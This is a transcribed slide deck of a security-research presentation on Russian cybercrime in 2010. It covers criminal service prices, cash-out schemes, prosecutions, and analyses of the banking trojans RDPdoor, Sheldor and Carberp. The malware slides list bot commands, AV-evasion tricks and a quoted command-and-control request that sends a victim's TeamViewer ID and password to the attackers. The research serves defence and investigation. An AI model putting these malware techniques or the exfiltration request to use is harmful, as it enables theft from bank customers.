Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Cybercrime in Russia: Trends and Issues


Published on

This report focuses on the development of Russian cybercrime. Firstly, it summarizes the economic and geopolitical factors that underlie computer crime, and which must be taken into consideration by researchers seeking to predict upcoming developments in cybercrime and cybercrime targeting. It goes on to look at the other ways in which Russian presence in the criminal cybersphere can be tracked, considering the technical approaches used by hackers in the region, how they link with economic and geographic factors, as well as with the part played by law enforcement in the investigation of international computer crimes.
The presentation will cover the following topics:
1. How cybercrime is interlinked with economic and geographical factors in Russia. The implications of the banking and instant payment systems of the Russian Federation.
2. Law Enforcement. The laws that currently obtain in the area of Russian computer crime: Legal evasions and loopholes.
3. Technical trends. The use of botnets to steal money from the Internet banking system for corporate clients: Technological and statistical analysis of the malware families involved, the organizational structures of the perpetrators, and the calculation of damages.
4. Successfully prosecuted cases in 2010. Complex investigation: spam affiliates, the WinLock case and others.
5. How DDoS attacks and botnet operations in Russian networks were tracked in co-operation with the Russian honeynet Project.

Published in: Technology
  • Login to see the comments

  • Be the first to like this

Cybercrime in Russia: Trends and Issues

  1. 1. Cybercrime in Russia: Trends and issues Robert Lipovsky, Aleksandr Matrosov and Dmitry Volkov
  2. 2. This presentation is confidential and not subject to public disclosure
  3. 3. AgendaGeneral cybercrime trends in 2010Most prevalent threats and incidentsReasons for the incidents’ growthEvolution of the cash-out schemeLegal evasions and loopholesSuccessful criminal prosecutionsAnalysis of malware used in the attacks
  4. 4. Group-IBoFirst and only public company in Russia engaged in digital crime investigation and computer forensics consultingoEstablished in 2003o Assistance to law enforcement authorities on particularly difficult caseso Partners and researchers in 48 countrieso Russian HoneyPot-Net projecto 24/7 monitoring and incident response
  5. 5. Cybercrime in 2010Global computer crime market turnover at7 billion dollarsShare of cybercriminals living in Russiaestimated at 1.3 billion dollars ~19% ofglobal crimeCybercriminals from Russian speakingcountries: 2.5 billion dollars ~36% ofglobal crime *research report "The Russian cybercrime market in 2010: status and trends”
  6. 6. Most prevalent threats and incidents1. Fraud targeted at Russian banks and payment systems2. SMS fraud using premium numbers(“winlockers”/LockScreen trojans)3. DDoS attacks – Growth in number and in power4. Unauthorized access to sensitive corporate information *research report "The Russian cybercrime market in 2010: status and trends”
  7. 7. Incident statistics by Group-IB forensic lab 1000 931 900 800 700 Share of cybercriminals living in Russia 586 600 estimated to increase to 2009 500 400 1.8 billion dollars in 2011 2010 300 (vs. 1.3 billion213 2010) in 200 124 72 92 100 60 30 0 unauthorized brand attacks DDoS bank fraud access SMS fraud (LockScreens) not shown because the numbers are disproportionally greater
  8. 8. DDoS attacks: Growth in number and power attackers DDoS bank if transaction exceeds 150 000 $ most powerful attack 100 Gb/sec (victims: UkrTelecom, Yandex, EvoSwitch but real target was a dating affiliate program)
  9. 9. SMS fraud using premium numbers:LockScreen malwareo If your country is affected, please, contact us for informationo Group-IB developed a case-tutorial for this type of investigation
  10. 10. Reasons for the incidents’ growtho Legal evasions and loopholeso Low cost of services in Russiao Lack of legal jobs for young IT- specialistso High profit and minimum investments from cybercrimeo Low information security vs. high cybercrime groups activitieso Shift of attack targets back to USSR :)
  11. 11. Cost of services in Russia Hacking of a website: from $50 Guaranteed hack of a mailbox (Yandex, Mail, Rambler, Gmail): from $45 Mobile phone bug: from 5000$ SMS service bug: from 1000$ Massive distribution of Trojan and spyware: from 20$ (1000 users) Spam services: o 400,000 companies - $55 o 1,800,000 private persons - $100 o 90,000 companies in St. Petersburg - $30 o 450,000 private persons in Ukraine - $50 o 6,000,000 private persons in Russia - $150 o 4,000,000 emails on - $200
  12. 12. Evolution of the Cash-out scheme For amounts up to 40k $
  13. 13. Evolution of the Cash-out scheme For amounts 40-200k $
  14. 14. Evolution of the Cash-out scheme For amounts over 200k $
  15. 15. Chapter 28 of the Penal Code Article 272. Article 273. Article 274. Illegal Access to Development, Use and Violation of Rules for Computer Information Spreading of Malicious the Operation of Software Computers, Computer Systems or Their Networks Criminal responsibility Maximum fine of 300 000 RUB Imprisonment for up to Imprisonment for up to or 7 years 4 years imprisonment for up to 5 years.
  16. 16. Legislative initiativesThe Committee against Cyber-Crime at theRussian Association of ElectronicCommunication (RAEC)Improvement of Russian legislation in thefield of cyber crimesAnti-SPAM legislationSupport against online child pornography
  17. 17. Successful criminal prosecutionso Group-IB, Economic Crimes Division and Dept K MVD busted a group of cybercriminals who developed and spread the “LockScreen” malwareo 10 cybercriminals have been arrested
  18. 18. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  19. 19. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  20. 20. Successful criminal prosecutions DDoS case (Cxim)o Provided DDoS as a serviceo Arrested for DDoS against Russian bankso 8 months in jail
  21. 21. Successful criminal prosecutions Russian bank-fraud caseGroup #1 o stole 600 000$ in a single transaction o case in court o used Win32/Sheldor Group #2 o stole 832 000$ (over 1 month) o case in court o used phishing sites (hosted on Gogax)
  22. 22. Interesting facts about Russian bank fraud • Mass distribution since 2009 1 • Six cybercrime groups attacking Russian banks 2 • Maximum amount stolen at one time from single bank account: 14 814 820$ 3
  23. 23. Interesting facts about Russian bank fraud These guys are still free!
  24. 24. Analysis of malwareused in the attacks on Russian Internet Banking systems
  25. 25. Overview2010: year of attacks on Russian banks• number of incidents has more than doubled compared to 2009*Over 95%* of incidents involve banking trojansMalware tailored to Russian banks and paymentsystemsHowever!• Can (and IS) used in other countries as well *research report "The Russian cybercrime market in 2010: status and trends”
  26. 26. Malware family share by incidents (%)*(in the last 6 months) 40 30 20 10 0 *as investigated by Group-IB
  27. 27. Most prevalent banking malware in Russia Malware Family Description Win32/RDPdoor Backdoor; uses MS Remote Desktop; botnet Win32/Sheldor Backdoor; abuses the TeamViewer application; botnet Win32/Carberp Universal trojan with modules for targeted attack on Russian banks; botnet Win32/Hodprot Downloader; installs other malware modules; strong encryption of its C&C protocol Win32/Qhost Malware that modifies the hosts file
  28. 28. Win32/RDPdoor
  29. 29. Stealing money using MS Remote Desktop…Win32/RDPdoor overview Appearance: First samples detected in April 2010 Cost: ~ 2.000$ Key feature: Abuses components of Thinsoft BeTwin for RDP • Most prevalent banking trojan in Russia • Bypassing advanced security mechanisms (Smartcards, etc.)
  30. 30. Win32/RDPdoor detection statistics by countryCloud data from ThreatSense.Net April 2010 – March 2011 Russia Ukraine Kazakhstan Belarus Thailand Bulgaria United States Israel Moldova Rest of the world
  31. 31. Win32/RDPdoor installation infected Win32/RDPdoorcomputer C&C run dropper and send system information 1 authentication on C&C and provide Thinsoft BeTwin for installation 2 send status information 3
  32. 32. Win32/RDPdoor installation
  33. 33. Win32/RDPdoor installation
  34. 34. Stealing authentication data1. Install GINA extension DLL2. Display fake logon screen3. Capture user name & password4. Send to C&C
  35. 35. Win32/RDPdoor bot commands Bot Command Description “P” change password for BeTwin terminal session “B” reinstall BeTwinServiceXP module “S” administration of BeTwin terminal session “R” install BeTwinServiceXP module “T” BeTwin backconnection initialization “U” update main modules and configuration
  36. 36. Win32/RDPdoor bot commands
  37. 37. Win32/RDPdoor updatingNew dropper with a new configuration embedded is received after „U‟command
  38. 38. Win32/Sheldor
  39. 39. Win32/Sheldor overview Appearance: First samples detected in June 2010 Cost: ~ 2.500$ Key feature: Abuses the TeamViewer application for remote access • Using the TeamViewer cloud adds another level of anonymity
  40. 40. Win32/Sheldor detection statistics by countryCloud data from ThreatSense.Net April 2010 – March 2011 Russia Ukraine Kazakhstan Moldova United States China Belarus Israel Georgia Rest of the world
  41. 41. Win32/Sheldor and TeamViewer in action1. Request cloud ID2. Set cloud ID3. Send ID to C&C TeamViewer4. Malicious connection cloud 1 2 infected 4 computer Win32/Sheldor 3 GET C&C /getinfo.php?id=414%20034%20883&pwd =6655&stat=1
  42. 42. Win32/Sheldor and TeamViewer in action1. Request cloud ID2. Set cloud ID3. Send ID to C&C4. Malicious connection GET /getinfo.php?id=414%20034%20883&pwd =6655&stat=1
  43. 43. Under the hood: DLL hooking TeamViewer.exe TV.dll (proxy DLL) TS.dll (original TS.dll)
  44. 44. Malicious DLL call graph
  45. 45. Malicious DLL decompilation Functions for calling from original TS.dll Load original TS.dll Hook functions C&C URL
  46. 46. Win32/Sheldor bot commands Bot Command Description exec download and ShellExecute/CreateThread additional module monitor_off send command “stop monitoring” to C&C monitor_on send command “start monitoring” to C&C power_off ExitWindowsEx(EWX_POWEROFF, SHTDN_REASON_MAJOR_OPERATINGSYSTEM) shutdown ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_OPERATINGSYSTEM) killbot delete all files, directories and registry keys
  47. 47. Sheldor C&C panel
  48. 48. Win32/Carberp
  49. 49. Win32/Carberp overview Appearance: First samples detected in February 2010 Cost: ~ 9.000$ Key feature: Advanced information stealing trojan with plug-ins • Customizable to specific banks • Man-in-the-browser attacks (IE, FireFox) • Grand Theft: Real cases with millions of $$$ stolen
  50. 50. Win32/Carberp detection statistics by countryCloud data from ThreatSense.Net April 2010 – March 2011 Russia Ukraine Spain United States Turkey Kazakhstan Italy Mexico Thailand Netherlands Argentina Belarus Greece United Kingdom Rest of the world
  51. 51. C&C panel: Bots by country
  52. 52. Win32/Carberp detections over time in RussiaCloud data from ThreatSense.Net April 2010 – March 2011
  53. 53. Win32/Carberp bot commands Bot Command Description update Download new version of Carberp dexec/download Download and execute PE-file kill_bot/killuser • Delete trojan from the system • Delete users Windows account (latest version) startsb/loaddll Download DLL and load into trojans memory address space grabber Grab HTML form data and send to C&C
  54. 54. Win32/Carberp self-protectionSelf-protect method Win32/Carberp.W Win32/Carberp.XBypassing AV-emulators many calls of GUI WinAPI many calls of GUI functions WinAPI functionsCode injection method ZwResumeThread() ZwQueueApcThread()Command and string custom encryptionencryption  algorithmBot authentication on C&C file with authentication  data stored on infected PCAPI function encryption custom encryption custom encryption algorithm algorithmDetection of AV hooks comparison of the first comparison of the first original bytes original bytesBypassing static AV adds random junk bytes to adds random junk bytessignatures dropped files to dropped filesHiding in the system hook system functions hook system functions
  55. 55. Win32/Carberp distribution channels Direct distribution Distribution via partners control “partnerka” affiliate ID panel (affiliate program) exploit pack • BlackHat SEO • Infected Blogs • etc
  56. 56. Win32/Carberp botnet control panel
  57. 57. Win32/Carberp control panel – Bank settings
  58. 58. Cab-files with stolen data
  59. 59. Stolen data: BS-Client IB system
  60. 60. Stolen data: CyberPlat payment system
  61. 61. Stolen data: iBank IB system
  62. 62. Stolen data: SberBank IB
  63. 63. Stolen data: UkrSibBank IB
  64. 64. Win32/Carberp SummaryCybercrime kit using multiple stealing techniquesSince early 2010 targeting other regions tooSeveral independent cybercrime groups involvedJoint investigation of Russian police, Group-IB andESET
  65. 65. Summary Win32/RDPdoor Win32/Sheldor Win32/CarberpFirst appearance April 2010 June 2010 February 2010Cost 2000 $ 2500 $ 9000 $Prevalence Russia, Russia, Russia, Ukraine, Ukraine, Ukraine, Kazakhstan Kazakhstan Spain, USARemote Access RDP via ThinSoft Via TeamViewer Via plug-ins BeTwinInformation stealing manually manually automatedPlug-ins   Complexity   Botnet   
  66. 66. Conclusion• Banks in other countries becoming new targets of Russian cybercrime groups• Attackers respond to new security measures with new methods to bypass them• Cybercriminals use stolen money to stay out of jail• Disabling C&C servers not enough to stop them• Only way of fighting them is by cooperation
  67. 67. Questions
  68. 68. Thank you for your attention ;) Robert Lipovsky, ESET Aleksandr Matrosov, ESET @matrosov Dmitry Volkov, Group-IB @groupib